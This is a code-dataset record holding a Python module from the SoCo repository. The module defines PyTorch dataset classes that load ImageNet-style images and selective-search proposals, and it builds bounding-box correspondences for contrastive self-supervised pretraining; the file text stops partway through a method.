hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
652213760a2216427e943a18b683cce58278aeb3
| 46,499
|
py
|
Python
|
contrast/data/dataset.py
|
Aliciaa-svg/SoCo
|
2be1229ab3d9ec8e72537a7c519f51dc03450ebb
|
[
"MIT"
] | 80
|
2021-10-22T03:26:42.000Z
|
2022-03-31T08:45:36.000Z
|
contrast/data/dataset.py
|
Aliciaa-svg/SoCo
|
2be1229ab3d9ec8e72537a7c519f51dc03450ebb
|
[
"MIT"
] | 17
|
2021-11-03T08:58:59.000Z
|
2022-03-03T13:39:47.000Z
|
contrast/data/dataset.py
|
Aliciaa-svg/SoCo
|
2be1229ab3d9ec8e72537a7c519f51dc03450ebb
|
[
"MIT"
] | 14
|
2021-10-31T14:34:34.000Z
|
2022-03-10T16:30:55.000Z
|
import io
import json
import logging
import os
import time
import numpy as np
import torch
import torch.distributed as dist
import torch.utils.data as data
from PIL import Image
from .bboxs_utils import (cal_overlap_params, clip_bboxs,
get_common_bboxs_ids, get_overlap_props, get_correspondence_matrix,
pad_bboxs_with_common, bboxs_to_tensor, resize_bboxs,
assign_bboxs_to_feature_map, get_aware_correspondence_matrix, jitter_props)
from .props_utils import select_props, convert_props
from .selective_search_utils import append_prop_id
from .zipreader import ZipReader, is_zip_path
def has_file_allowed_extension(filename, extensions):
"""Checks if a file is an allowed extension.
Args:
filename (string): path to a file
Returns:
bool: True if the filename ends with a known image extension
"""
filename_lower = filename.lower()
return any(filename_lower.endswith(ext) for ext in extensions)
def find_classes(dir):
classes = [d for d in os.listdir(dir) if os.path.isdir(os.path.join(dir, d))]
classes.sort()
class_to_idx = {classes[i]: i for i in range(len(classes))}
return classes, class_to_idx
def make_dataset(dir, class_to_idx, extensions):
images = []
dir = os.path.expanduser(dir)
for target in sorted(os.listdir(dir)):
d = os.path.join(dir, target)
if not os.path.isdir(d):
continue
for root, _, fnames in sorted(os.walk(d)):
for fname in sorted(fnames):
if has_file_allowed_extension(fname, extensions):
path = os.path.join(root, fname)
item = (path, class_to_idx[target])
images.append(item)
return images
def make_dataset_with_ann(ann_file, img_prefix, extensions, dataset='ImageNet'):
images = []
with open(ann_file, "r") as f:
contents = f.readlines()
for line_str in contents:
path_contents = [c for c in line_str.split()]
im_file_name = path_contents[0]
class_index = int(path_contents[1])
assert str.lower(os.path.splitext(im_file_name)[-1]) in extensions
item = (os.path.join(img_prefix, im_file_name), class_index)
images.append(item)
return images
def make_props_dataset_with_ann(ann_file, props_file, select_strategy, select_k, dataset='ImageNet', rpn_props=False, rpn_score_thres=0.5):
with open(props_file, "r") as f:
props_dict = json.load(f)
# make ImageNet or VOC dataset
with open(ann_file, "r") as f:
contents = f.readlines()
images_props = [None] * len(contents)
for i, line_str in enumerate(contents):
path_contents = [c for c in line_str.split('\t')]
im_file_name = path_contents[0]
basename = os.path.basename(im_file_name).split('.')[0]
all_props = props_dict[basename]
converted_props = convert_props(all_props)
images_props[i] = converted_props # keep all propos
del contents
del props_dict
return images_props
class DatasetFolder(data.Dataset):
"""A generic data loader where the samples are arranged in this way: ::
root/class_x/xxx.ext
root/class_x/xxy.ext
root/class_x/xxz.ext
root/class_y/123.ext
root/class_y/nsdf3.ext
root/class_y/asd932_.ext
Args:
root (string): Root directory path.
loader (callable): A function to load a sample given its path.
extensions (list[string]): A list of allowed extensions.
transform (callable, optional): A function/transform that takes in
a sample and returns a transformed version.
E.g, ``transforms.RandomCrop`` for images.
target_transform (callable, optional): A function/transform that takes
in the target and transforms it.
Attributes:
samples (list): List of (sample path, class_index) tuples
"""
def __init__(self, root, loader, extensions, ann_file='', img_prefix='', transform=None, target_transform=None,
cache_mode="no", dataset='ImageNet'):
# image folder mode
if ann_file == '':
_, class_to_idx = find_classes(root)
samples = make_dataset(root, class_to_idx, extensions)
# zip mode
else:
samples = make_dataset_with_ann(os.path.join(root, ann_file),
os.path.join(root, img_prefix),
extensions,
dataset)
if len(samples) == 0:
raise(RuntimeError("Found 0 files in subfolders of: " + root + "\n"
"Supported extensions are: " + ",".join(extensions)))
self.root = root
self.loader = loader
self.extensions = extensions
self.samples = samples
self.labels = [y_1k for _, y_1k in samples]
self.classes = list(set(self.labels))
self.transform = transform
self.target_transform = target_transform
self.cache_mode = cache_mode
if self.cache_mode != "no":
self.init_cache()
def init_cache(self):
assert self.cache_mode in ["part", "full"]
n_sample = len(self.samples)
global_rank = dist.get_rank()
world_size = dist.get_world_size()
samples_bytes = [None for _ in range(n_sample)]
start_time = time.time()
for index in range(n_sample):
if index % (n_sample//10) == 0:
t = time.time() - start_time
logger = logging.getLogger(__name__)
logger.info(f'cached {index}/{n_sample} takes {t:.2f}s per block')
start_time = time.time()
path, target = self.samples[index]
if self.cache_mode == "full" or index % world_size == global_rank:
samples_bytes[index] = (ZipReader.read(path), target)
else:
samples_bytes[index] = (path, target)
self.samples = samples_bytes
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (sample, target) where target is class_index of the target class.
"""
path, target = self.samples[index]
sample = self.loader(path)
if self.transform is not None:
sample = self.transform(sample)
if self.target_transform is not None:
target = self.target_transform(target)
return sample, target
def __len__(self):
return len(self.samples)
def __repr__(self):
fmt_str = 'Dataset ' + self.__class__.__name__ + '\n'
fmt_str += ' Number of datapoints: {}\n'.format(self.__len__())
fmt_str += ' Root Location: {}\n'.format(self.root)
tmp = ' Transforms (if any): '
fmt_str += '{0}{1}\n'.format(tmp, self.transform.__repr__().replace('\n', '\n' + ' ' * len(tmp)))
tmp = ' Target Transforms (if any): '
fmt_str += '{0}{1}'.format(tmp, self.target_transform.__repr__().replace('\n', '\n' + ' ' * len(tmp)))
return fmt_str
class DatasetFolderProps(data.Dataset):
def __init__(self, root, loader, extensions, ann_file='', img_prefix='', train_props_file='',
select_strategy='', select_k=0,
transform=None, target_transform=None,
cache_mode="no", dataset='ImageNet', rpn_props=False, rpn_score_thres=0.5):
# image folder mode
if ann_file == '':
_, class_to_idx = find_classes(root)
samples = make_dataset(root, class_to_idx, extensions)
# zip mode
else:
samples = make_dataset_with_ann(os.path.join(root, ann_file),
os.path.join(root, img_prefix),
extensions,
dataset)
samples_props = make_props_dataset_with_ann(os.path.join(root, ann_file),
os.path.join(root, train_props_file),
select_strategy, select_k,
dataset=dataset, rpn_props=rpn_props, rpn_score_thres=rpn_score_thres)
if len(samples) == 0:
raise(RuntimeError("Found 0 files in subfolders of: " + root + "\n"
"Supported extensions are: " + ",".join(extensions)))
if len(samples_props) == 0:
raise(RuntimeError("Not found the proposal files"))
self.root = root
self.loader = loader
self.extensions = extensions
self.samples = samples
self.samples_props = samples_props
self.labels = [y_1k for _, y_1k in samples]
self.classes = list(set(self.labels))
self.transform = transform
self.target_transform = target_transform
self.cache_mode = cache_mode
if self.cache_mode != "no":
self.init_cache()
def init_cache(self):
assert self.cache_mode in ["part", "full"]
n_sample = len(self.samples)
global_rank = dist.get_rank()
world_size = dist.get_world_size()
samples_bytes = [None for _ in range(n_sample)]
start_time = time.time()
for index in range(n_sample):
if index % (n_sample//10) == 0:
t = time.time() - start_time
logger = logging.getLogger(__name__)
logger.info(f'cached {index}/{n_sample} takes {t:.2f}s per block')
start_time = time.time()
path, target = self.samples[index]
if self.cache_mode == "full" or index % world_size == global_rank:
samples_bytes[index] = (ZipReader.read(path), target)
else:
samples_bytes[index] = (path, target)
self.samples = samples_bytes
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (sample, target) where target is class_index of the target class.
"""
path, target = self.samples[index]
sample = self.loader(path)
if self.transform is not None:
sample = self.transform(sample)
if self.target_transform is not None:
target = self.target_transform(target)
return sample, target
def __len__(self):
return len(self.samples)
def __repr__(self):
fmt_str = 'Dataset ' + self.__class__.__name__ + '\n'
fmt_str += ' Number of datapoints: {}\n'.format(self.__len__())
fmt_str += ' Root Location: {}\n'.format(self.root)
tmp = ' Transforms (if any): '
fmt_str += '{0}{1}\n'.format(tmp, self.transform.__repr__().replace('\n', '\n' + ' ' * len(tmp)))
tmp = ' Target Transforms (if any): '
fmt_str += '{0}{1}'.format(tmp, self.target_transform.__repr__().replace('\n', '\n' + ' ' * len(tmp)))
return fmt_str
IMG_EXTENSIONS = ['.jpg', '.jpeg', '.png', '.ppm', '.bmp', '.pgm', '.tif']
def pil_loader(path):
# open path as file to avoid ResourceWarning (https://github.com/python-pillow/Pillow/issues/835)
if isinstance(path, bytes):
img = Image.open(io.BytesIO(path))
elif is_zip_path(path):
data = ZipReader.read(path)
img = Image.open(io.BytesIO(data))
else:
with open(path, 'rb') as f:
img = Image.open(f)
return img.convert('RGB')
def accimage_loader(path):
import accimage # type: ignore
try:
return accimage.Image(path)
except IOError:
# Potentially a decoding problem, fall back to PIL.Image
return pil_loader(path)
def default_img_loader(path):
from torchvision import get_image_backend
if get_image_backend() == 'accimage':
return accimage_loader(path)
else:
return pil_loader(path)
class ImageFolder(DatasetFolder):
"""A generic data loader where the images are arranged in this way: ::
root/dog/xxx.png
root/dog/xxy.png
root/dog/xxz.png
root/cat/123.png
root/cat/nsdf3.png
root/cat/asd932_.png
Args:
root (string): Root directory path.
transform (callable, optional): A function/transform that takes in an PIL image
and returns a transformed version. E.g, ``transforms.RandomCrop``
target_transform (callable, optional): A function/transform that takes in the
target and transforms it.
loader (callable, optional): A function to load an image given its path.
Attributes:
imgs (list): List of (image path, class_index) tuples
"""
def __init__(self, root, ann_file='', img_prefix='', transform=None, target_transform=None,
loader=default_img_loader, cache_mode="no", dataset='ImageNet',
two_crop=False, return_coord=False):
super(ImageFolder, self).__init__(root, loader, IMG_EXTENSIONS,
ann_file=ann_file, img_prefix=img_prefix,
transform=transform, target_transform=target_transform,
cache_mode=cache_mode, dataset=dataset)
self.imgs = self.samples
self.two_crop = two_crop
self.return_coord = return_coord
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is class_index of the target class.
"""
path, target = self.samples[index]
image = self.loader(path)
if self.transform is not None:
if isinstance(self.transform, tuple) and len(self.transform) == 2:
img = self.transform[0](image)
else:
img = self.transform(image)
else:
img = image
if self.target_transform is not None:
target = self.target_transform(target)
if self.two_crop:
if isinstance(self.transform, tuple) and len(self.transform) == 2:
img2 = self.transform[1](image)
else:
img2 = self.transform(image)
if self.return_coord:
assert isinstance(img, tuple)
img, coord = img
if self.two_crop:
img2, coord2 = img2
return img, img2, coord, coord2, index, target
else:
return img, coord, index, target
else:
if isinstance(img, tuple):
img, coord = img
if self.two_crop:
if isinstance(img2, tuple):
img2, coord2 = img2
return img, img2, index, target
else:
return img, index, target
class ImageFolderImageAsymBboxCutout(DatasetFolderProps):
def __init__(self, root, ann_file='', img_prefix='', train_props_file='',
image_size=0, select_strategy='', select_k=0, weight_strategy='',
jitter_ratio=0.0, padding_k='', aware_range=[], aware_start=0, aware_end=4,
max_tries=0,
transform=None, target_transform=None,
loader=default_img_loader, cache_mode="no", dataset='ImageNet'):
super(ImageFolderImageAsymBboxCutout, self).__init__(root, loader, IMG_EXTENSIONS,
ann_file=ann_file, img_prefix=img_prefix,
train_props_file=train_props_file,
select_strategy=select_strategy, select_k=select_k,
transform=transform, target_transform=target_transform,
cache_mode=cache_mode, dataset=dataset)
self.imgs = self.samples
self.props = self.samples_props
self.select_strategy = select_strategy
self.select_k = select_k
self.weight_strategy = weight_strategy
self.jitter_ratio = jitter_ratio
self.padding_k = padding_k
self.view_size = (image_size, image_size)
self.debug = False
self.max_tries = max_tries
self.least_common = max(self.padding_k // 2, 1)
self.aware_range = aware_range
assert len(self.aware_range) == 5, 'Must give P2 P3 P4 P5 P6 size range'
self.aware_start = aware_start # starting from 0 means use p2
self.aware_end = aware_end # end, if use P6 might be 5
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is class_index of the target class.
"""
path, target = self.samples[index]
image = self.loader(path)
image_size = image.size
image_proposals = self.props[index] # for cur image, numpy array type, [[x1, y1, x2, y2]] x2 = x1 + w - 1
if image_proposals.shape[0] == 0: # if no proposals, insert one single proposal, the whole raw image
image_proposals = np.array([[0, 0, image_size[0] - 1, image_size[1] - 1]])
image_proposals_w_id = append_prop_id(image_proposals) # start from 1
assert len(self.transform) == 6
# transform = (transform_whole_img, transform_img, transform_flip, transform_post_1, transform_post_2, transform_cutout)
tries = 0
least_common = self.least_common
while tries < self.max_tries:
img, params = self.transform[0](image) # whole image resize
img2, params2 = self.transform[1](image) # random crop resize
params_overlap = cal_overlap_params(params, params2)
overlap_props = get_overlap_props(image_proposals_w_id, params_overlap)
selected_image_props = select_props(overlap_props, self.select_strategy, self.select_k) # check paras are
# TODO: ensure clipped bboxs width and height are greater than 32
if selected_image_props.shape[0] >= least_common: # ok
break
least_common = max(least_common // 2, 1)
tries += 1
bboxs = clip_bboxs(selected_image_props, params[0], params[1], params[2], params[3])
bboxs2 = clip_bboxs(selected_image_props, params2[0], params2[1], params2[2], params2[3])
common_bboxs_ids = get_common_bboxs_ids(bboxs, bboxs2)
pad1 = self.padding_k - bboxs.shape[0]
if pad1 > 0:
# pad_bboxs = jitter_bboxs(bboxs, common_bboxs_ids, self.jitter_ratio, pad1, params[2], params[3])
pad_bboxs = pad_bboxs_with_common(bboxs, common_bboxs_ids, self.jitter_ratio, pad1, params[2], params[3])
bboxs = np.concatenate([bboxs, pad_bboxs], axis=0)
pad2 = self.padding_k - bboxs2.shape[0]
if pad2 > 0:
# pad_bboxs2 = jitter_bboxs(bboxs2, common_bboxs_ids, self.jitter_ratio, pad2, params2[2], params2[3])
pad_bboxs2 = pad_bboxs_with_common(bboxs2, common_bboxs_ids, self.jitter_ratio, pad2, params2[2], params2[3])
bboxs2 = np.concatenate([bboxs2, pad_bboxs2], axis=0)
correspondence = get_correspondence_matrix(bboxs, bboxs2)
resized_bboxs = resize_bboxs(bboxs, params[2], params[3], self.view_size)
resized_bboxs2 = resize_bboxs(bboxs2, params2[2], params2[3], self.view_size)
resized_bboxs = resized_bboxs.astype(int)
resized_bboxs2 = resized_bboxs2.astype(int)
bboxs = bboxs_to_tensor(bboxs, params) # x1y1x2y2 -> x1y1x2y2 (0, 1)
bboxs2 = bboxs_to_tensor(bboxs2, params2) # x1y1x2y2 -> x1y1x2y2 (0, 1)
img, bboxs, params = self.transform[2](img, bboxs, params) # flip
img2, bboxs2, params2 = self.transform[2](img2, bboxs2, params2)
img1_1x = self.transform[3](img) # color
img2_1x = self.transform[4](img2) # color
img2_1x_cut = self.transform[5](img2_1x, resized_bboxs2) # cutout
return img1_1x, img2_1x_cut, bboxs, bboxs2, correspondence, index, target
class ImageFolderImageAsymBboxAwareMultiJitter1(DatasetFolderProps):
def __init__(self, root, ann_file='', img_prefix='', train_props_file='',
image_size=0, select_strategy='', select_k=0, weight_strategy='',
jitter_prob=0.0, jitter_ratio=0.0,
padding_k='', aware_range=[], aware_start=0, aware_end=4, max_tries=0,
transform=None, target_transform=None,
loader=default_img_loader, cache_mode="no", dataset='ImageNet'):
super(ImageFolderImageAsymBboxAwareMultiJitter1, self).__init__(root, loader, IMG_EXTENSIONS,
ann_file=ann_file, img_prefix=img_prefix,
train_props_file=train_props_file,
select_strategy=select_strategy, select_k=select_k,
transform=transform, target_transform=target_transform,
cache_mode=cache_mode, dataset=dataset)
self.imgs = self.samples
self.props = self.samples_props
self.select_strategy = select_strategy
self.select_k = select_k
self.weight_strategy = weight_strategy
self.jitter_prob = jitter_prob
self.jitter_ratio = jitter_ratio
self.padding_k = padding_k
self.view_size = (image_size, image_size)
self.view_size_3 = (image_size//2, image_size//2)
self.debug = False
self.max_tries = max_tries
self.least_common = max(self.padding_k // 2, 1)
self.aware_range = aware_range
assert len(self.aware_range) == 5, 'Must give P2 P3 P4 P5 P6 size range'
self.aware_start = aware_start # starting from 0 means use p2
self.aware_end = aware_end # end, if use P6 might be 5
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is class_index of the target class.
"""
path, target = self.samples[index]
image = self.loader(path)
image_size = image.size
image_proposals = self.props[index] # for cur image, numpy array type, [[x1, y1, x2, y2]] x2 = x1 + w - 1
if image_proposals.shape[0] == 0: # if no proposals, insert one single proposal, the whole raw image
image_proposals = np.array([[0, 0, image_size[0] - 1, image_size[1] - 1]])
image_proposals_w_id = append_prop_id(image_proposals) # start from 1
assert len(self.transform) == 7
# transform = (transform_whole_img, transform_img, transform_img_small, transform_flip_flip, transform_flip, transform_post_1, transform_post_2)
tries = 0
least_common = self.least_common
while tries < self.max_tries:
img, params = self.transform[0](image) # whole image resize
img2, params2 = self.transform[1](image) # random crop resize
img3, params3 = self.transform[2](image) # small random crop resize
params_overlap12 = cal_overlap_params(params, params2)
overlap_props12 = get_overlap_props(image_proposals_w_id, params_overlap12)
selected_image_props12 = select_props(overlap_props12, self.select_strategy, self.select_k) # check paras are
params_overlap13 = cal_overlap_params(params, params3)
overlap_props13 = get_overlap_props(image_proposals_w_id, params_overlap13)
selected_image_props13 = select_props(overlap_props13, self.select_strategy, self.select_k) # check paras are
# TODO: ensure clipped bboxs width and height are greater than 32
if selected_image_props12.shape[0] >= least_common and selected_image_props13.shape[0] >= least_common: # ok
break
least_common = max(least_common // 2, 1)
tries += 1
jittered_selected_image_props12 = jitter_props(selected_image_props12, self.jitter_prob, self.jitter_ratio)
jittered_selected_image_props13 = jitter_props(selected_image_props13, self.jitter_prob, self.jitter_ratio)
bboxs1_12 = clip_bboxs(jittered_selected_image_props12, params[0], params[1], params[2], params[3])
bboxs1_13 = clip_bboxs(jittered_selected_image_props13, params[0], params[1], params[2], params[3])
bboxs2 = clip_bboxs(selected_image_props12, params2[0], params2[1], params2[2], params2[3])
bboxs3 = clip_bboxs(selected_image_props13, params3[0], params3[1], params3[2], params3[3])
common_bboxs_ids12 = get_common_bboxs_ids(bboxs1_12, bboxs2)
common_bboxs_ids13 = get_common_bboxs_ids(bboxs1_13, bboxs3)
pad1_12 = self.padding_k - bboxs1_12.shape[0]
if pad1_12 > 0:
pad_bboxs1_12 = pad_bboxs_with_common(bboxs1_12, common_bboxs_ids12, self.jitter_ratio, pad1_12, params[2], params[3])
bboxs1_12 = np.concatenate([bboxs1_12, pad_bboxs1_12], axis=0)
pad1_13 = self.padding_k - bboxs1_13.shape[0]
if pad1_13 > 0:
pad_bboxs1_13 = pad_bboxs_with_common(bboxs1_13, common_bboxs_ids13, self.jitter_ratio, pad1_13, params[2], params[3])
bboxs1_13 = np.concatenate([bboxs1_13, pad_bboxs1_13], axis=0)
pad2 = self.padding_k - bboxs2.shape[0]
if pad2 > 0:
pad_bboxs2 = pad_bboxs_with_common(bboxs2, common_bboxs_ids12, self.jitter_ratio, pad2, params2[2], params2[3])
bboxs2 = np.concatenate([bboxs2, pad_bboxs2], axis=0)
pad3 = self.padding_k - bboxs3.shape[0]
if pad3 > 0:
pad_bboxs3 = pad_bboxs_with_common(bboxs3, common_bboxs_ids13, self.jitter_ratio, pad3, params3[2], params3[3])
bboxs3 = np.concatenate([bboxs3, pad_bboxs3], axis=0)
resized_bboxs1_12 = resize_bboxs(bboxs1_12, params[2], params[3], self.view_size)
resized_bboxs1_13 = resize_bboxs(bboxs1_13, params[2], params[3], self.view_size)
resized_bboxs2 = resize_bboxs(bboxs2, params2[2], params2[3], self.view_size)
resized_bboxs3 = resize_bboxs(bboxs3, params3[2], params3[3], self.view_size_3)
resized_bboxs1_12 = resized_bboxs1_12.astype(int)
resized_bboxs1_13 = resized_bboxs1_13.astype(int)
resized_bboxs2 = resized_bboxs2.astype(int)
resized_bboxs3 = resized_bboxs3.astype(int)
bboxs1_12_with_feature_assign = assign_bboxs_to_feature_map(resized_bboxs1_12, self.aware_range, self.aware_start, self.aware_end, -1)
bboxs1_13_with_feature_assign = assign_bboxs_to_feature_map(resized_bboxs1_13, self.aware_range, self.aware_start, self.aware_end, -1)
bboxs2_with_feature_assign = assign_bboxs_to_feature_map(resized_bboxs2, self.aware_range, self.aware_start, self.aware_end, -2)
bboxs3_with_feature_assign = assign_bboxs_to_feature_map(resized_bboxs3, self.aware_range, self.aware_start, self.aware_end, -3)
aware_corres_12 = get_aware_correspondence_matrix(bboxs1_12_with_feature_assign, bboxs2_with_feature_assign)
aware_corres_13 = get_aware_correspondence_matrix(bboxs1_13_with_feature_assign, bboxs3_with_feature_assign)
bboxs1_12 = bboxs_to_tensor(bboxs1_12, params) # x1y1x2y2 -> x1y1x2y2 (0, 1)
bboxs1_13 = bboxs_to_tensor(bboxs1_13, params) # x1y1x2y2 -> x1y1x2y2 (0, 1)
bboxs2 = bboxs_to_tensor(bboxs2, params2) # x1y1x2y2 -> x1y1x2y2 (0, 1)
bboxs3 = bboxs_to_tensor(bboxs3, params3) # x1y1x2y2 -> x1y1x2y2 (0, 1)
img, bboxs1_12, bboxs1_13, params = self.transform[3](img, bboxs1_12, bboxs1_13, params) # flip
img2, bboxs2, params2 = self.transform[4](img2, bboxs2, params2) # flip
img3, bboxs3, params3 = self.transform[4](img3, bboxs3, params3) # flip
img1 = self.transform[5](img) # color
img2 = self.transform[6](img2) # color
img3 = self.transform[6](img3) # color
return img1, img2, img3, bboxs1_12, bboxs1_13, bboxs2, bboxs3, aware_corres_12, aware_corres_13, index, target
class ImageFolderImageAsymBboxAwareMultiJitter1Cutout(DatasetFolderProps):
def __init__(self, root, ann_file='', img_prefix='', train_props_file='',
image_size=0, select_strategy='', select_k=0, weight_strategy='',
jitter_prob=0.0, jitter_ratio=0.0,
padding_k='', aware_range=[], aware_start=0, aware_end=4, max_tries=0,
transform=None, target_transform=None,
loader=default_img_loader, cache_mode="no", dataset='ImageNet'):
super(ImageFolderImageAsymBboxAwareMultiJitter1Cutout, self).__init__(root, loader, IMG_EXTENSIONS,
ann_file=ann_file, img_prefix=img_prefix,
train_props_file=train_props_file,
select_strategy=select_strategy, select_k=select_k,
transform=transform, target_transform=target_transform,
cache_mode=cache_mode, dataset=dataset)
self.imgs = self.samples
self.props = self.samples_props
self.select_strategy = select_strategy
self.select_k = select_k
self.weight_strategy = weight_strategy
self.jitter_prob = jitter_prob
self.jitter_ratio = jitter_ratio
self.padding_k = padding_k
self.view_size = (image_size, image_size)
self.view_size_3 = (image_size//2, image_size//2)
self.debug = False
self.max_tries = max_tries
self.least_common = max(self.padding_k // 2, 1)
self.aware_range = aware_range
assert len(self.aware_range) == 5, 'Must give P2 P3 P4 P5 P6 size range'
self.aware_start = aware_start # starting from 0 means use p2
self.aware_end = aware_end # end, if use P6 might be 5
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is class_index of the target class.
"""
path, target = self.samples[index]
image = self.loader(path)
image_size = image.size
image_proposals = self.props[index] # for cur image, numpy array type, [[x1, y1, x2, y2]] x2 = x1 + w - 1
if image_proposals.shape[0] == 0: # if no proposals, insert one single proposal, the whole raw image
image_proposals = np.array([[0, 0, image_size[0] - 1, image_size[1] - 1]])
image_proposals_w_id = append_prop_id(image_proposals) # start from 1
assert len(self.transform) == 8
# transform = (transform_whole_img, transform_img, transform_img_small, transform_flip_flip, transform_flip, transform_post_1, transform_post_2, transform_cutout)
tries = 0
least_common = self.least_common
while tries < self.max_tries:
img, params = self.transform[0](image) # whole image resize
img2, params2 = self.transform[1](image) # random crop resize
img3, params3 = self.transform[2](image) # small random crop resize
params_overlap12 = cal_overlap_params(params, params2)
overlap_props12 = get_overlap_props(image_proposals_w_id, params_overlap12)
selected_image_props12 = select_props(overlap_props12, self.select_strategy, self.select_k) # check paras are
params_overlap13 = cal_overlap_params(params, params3)
overlap_props13 = get_overlap_props(image_proposals_w_id, params_overlap13)
selected_image_props13 = select_props(overlap_props13, self.select_strategy, self.select_k) # check paras are
# TODO: ensure clipped bboxs width and height are greater than 32
if selected_image_props12.shape[0] >= least_common and selected_image_props13.shape[0] >= least_common: # ok
break
least_common = max(least_common // 2, 1)
tries += 1
jittered_selected_image_props12 = jitter_props(selected_image_props12, self.jitter_prob, self.jitter_ratio)
jittered_selected_image_props13 = jitter_props(selected_image_props13, self.jitter_prob, self.jitter_ratio)
bboxs1_12 = clip_bboxs(jittered_selected_image_props12, params[0], params[1], params[2], params[3])
bboxs1_13 = clip_bboxs(jittered_selected_image_props13, params[0], params[1], params[2], params[3])
bboxs2 = clip_bboxs(selected_image_props12, params2[0], params2[1], params2[2], params2[3])
bboxs3 = clip_bboxs(selected_image_props13, params3[0], params3[1], params3[2], params3[3])
common_bboxs_ids12 = get_common_bboxs_ids(bboxs1_12, bboxs2)
common_bboxs_ids13 = get_common_bboxs_ids(bboxs1_13, bboxs3)
pad1_12 = self.padding_k - bboxs1_12.shape[0]
if pad1_12 > 0:
pad_bboxs1_12 = pad_bboxs_with_common(bboxs1_12, common_bboxs_ids12, self.jitter_ratio, pad1_12, params[2], params[3])
